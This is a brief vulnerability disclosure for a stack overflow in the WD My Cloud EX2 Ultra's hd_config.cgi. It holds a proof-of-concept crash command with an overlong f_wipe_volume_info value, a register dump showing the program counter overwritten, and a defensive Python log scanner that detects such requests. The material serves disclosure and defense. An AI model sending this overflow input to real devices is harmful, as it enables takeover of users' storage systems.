CVE-2019-18931

Information

Target      : WD My Cloud EX2 Ultra
Version     : 2.31.195

Proof of Concept

$ qemu-arm-static -g 1234 -E "QUERY_STRING=cmd=cgi_FMT_Wipe_DiskMGR&f_wipe_volume_info=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&form=" -E REQUEST_METHOD=GET ~/afl/newpj3/targets/_hd_config.cgi/hd_config.cgi
gdb-peda$ info registers 
r0             0x9   0x9
r1             0x0   0x0
r2             0xf655d6b8   0xf655d6b8
r3             0xf655cd50   0xf655cd50
r4             0x61616161   0x61616161
r5             0x61616161   0x61616161
r6             0x61616161   0x61616161
r7             0x61616161   0x61616161
r8             0x0   0x0
r9             0xf67bf0f4   0xf67bf0f4
r10            0xf67fe000   0xf67fe000
r11            0x0   0x0
r12            0x3e   0x3e
sp             0xf6fff1b8   0xf6fff1b8
lr             0x61616161   0x61616161
pc             0x61616160   0x61616160
cpsr           0x20000030   0x20000030

Exploit

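In the register dump above, r4 through r7 and lr hold 0x61616161 (the bytes "aaaa" from the f_wipe_volume_info parameter) and pc is 0x61616160, so the PC register is attacker-controlled. ASLR can be bypassed with a brute-force attack.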

I will disclose exploit code soon!
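
The proof of concept above crashes hd_config.cgi with an overlong f_wipe_volume_info value in a cmd=cgi_FMT_Wipe_DiskMGR request. The following is an added example, not part of the original repository, that flags such requests in web access logs; the 128-character limit, the combined log format and the /cgi-bin/ path in the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET_CGI = "hd_config.cgi"          # from the PoC
TARGET_CMD = "cgi_FMT_Wipe_DiskMGR"   # from the PoC
TARGET_PARAM = "f_wipe_volume_info"   # from the PoC
MAX_PARAM_LEN = 128  # assumption: legitimate values are short; tune per site

# Request field of a combined-format access log line: "METHOD URI PROTOCOL"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')

def suspicious_length(log_line):
    """Return the decoded length of an oversized f_wipe_volume_info, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group("uri"))
    # Match on the file name only, so the check does not depend on the URL prefix.
    if url.path.rsplit("/", 1)[-1] != TARGET_CGI:
        return None
    # parse_qs percent-decodes, so "%61%61..." is measured as the bytes it carries.
    params = parse_qs(url.query, keep_blank_values=True)
    if TARGET_CMD not in params.get("cmd", []):
        return None
    longest = max((len(v) for v in params.get(TARGET_PARAM, [])), default=0)
    return longest if longest > MAX_PARAM_LEN else None

def scan(lines):
    """Return (line_number, value_length) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        length = suspicious_length(line)
        if length is not None:
            hits.append((number, length))
    return hits

# Constructed sample log lines (addresses, timestamps and URL prefix are made up).
_PREFIX = '192.0.2.10 - - [01/Jan/2020:00:00:01 +0000] "GET /cgi-bin/'
_QUERY = "?cmd=cgi_FMT_Wipe_DiskMGR&f_wipe_volume_info="
SAMPLE_LOG = [
    _PREFIX + "hd_config.cgi" + _QUERY + "a" * 600 + '&form= HTTP/1.1" 200 0',
    _PREFIX + "hd_config.cgi" + _QUERY + 'Volume_1&form= HTTP/1.1" 200 0',
    _PREFIX + "other.cgi" + _QUERY + "a" * 600 + '&form= HTTP/1.1" 200 0',
    _PREFIX + "hd_config.cgi" + _QUERY + "%61" * 200 + '&form= HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for number, length in scan(SAMPLE_LOG):
        print(f"line {number}: {TARGET_PARAM} is {length} characters long")
```

Access logs record only the query string, so the same parameter sent in a POST body needs the equivalent check at a reverse proxy or in the CGI itself.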